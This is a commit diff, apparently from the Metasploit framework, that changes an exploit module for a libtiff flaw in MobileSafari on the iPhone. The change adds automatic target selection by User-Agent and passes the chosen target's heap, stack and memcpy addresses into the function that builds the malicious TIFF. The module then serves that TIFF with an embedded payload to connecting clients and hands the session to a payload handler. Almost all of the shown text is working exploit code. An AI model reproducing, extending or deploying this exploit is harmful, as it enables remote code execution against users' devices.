Automatic targetting
git-svn-id: file:///home/svn/framework3/trunk@5147 4d416f70-5f16-0410-b530-b9f4589650daunstable
HD Moore
parent
ad4d4db792
commit
3050615029
|
|
@ -58,6 +58,14 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
|
|||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'MobileSafari iPhone Mac OS X Automatic',
|
||||
{
|
||||
'Platform' => 'osx',
|
||||
'Arch' => ARCH_ARMLE,
|
||||
'Automatic' => true
|
||||
}
|
||||
],
|
||||
|
||||
[ 'MobileSafari iPhone Mac OS X armle (1.00, 1.01, 1.02)',
|
||||
{
|
||||
'Platform' => 'osx',
|
||||
|
|
@ -77,25 +85,36 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
|
|||
}
|
||||
],
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Aug 01 2006'
|
||||
))
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
def on_request_uri(cli, req)
|
||||
|
||||
# Re-generate the payload
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
|
||||
t = target
|
||||
if(target['Automatic'])
|
||||
|
||||
t = self.targets[1]
|
||||
case req.headers['User-Agent']
|
||||
when /iPhone.*420\.1/
|
||||
t = self.targets[2]
|
||||
end
|
||||
end
|
||||
|
||||
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport} #{t.name}...")
|
||||
|
||||
# Transmit the compressed response to the client
|
||||
send_response(cli, generate_tiff(p), { 'Content-Type' => 'image/tiff' })
|
||||
send_response(cli, generate_tiff(p, t), { 'Content-Type' => 'image/tiff' })
|
||||
|
||||
# Handle the payload
|
||||
handler(cli)
|
||||
end
|
||||
|
||||
def generate_tiff(code)
|
||||
def generate_tiff(code, targ)
|
||||
|
||||
path = File.join(Msf::Config.install_root, "data", "exploits", "iphone_libtiff.bin")
|
||||
|
||||
|
|
@ -115,8 +134,8 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
|
|||
# return back to the heap location we copied the stack to.
|
||||
#
|
||||
|
||||
dst_ptr = target['Heap']
|
||||
src_ptr = target['Stack']
|
||||
dst_ptr = targ['Heap']
|
||||
src_ptr = targ['Stack']
|
||||
shl_len = 168 + payload.encoded.length
|
||||
|
||||
# Still some wonky characters in here, this doesn't work with alpha/english/etc
|
||||
|
|
@ -127,7 +146,7 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
|
|||
|
||||
|
||||
# memcpy(r0, r1, r2)
|
||||
patt[140,4] = [target['Memcpy']].pack("V") # memcpy @ 0x3009a1bc
|
||||
patt[140,4] = [targ['Memcpy']].pack("V") # memcpy @ 0x3009a1bc
|
||||
patt[124,4] = [dst_ptr].pack("V") # dst
|
||||
patt[128,4] = [src_ptr].pack("V") # src
|
||||
patt[132,4] = [shl_len].pack("V") # len
|
||||
|
|
|
|||
Loading…
Reference in New Issue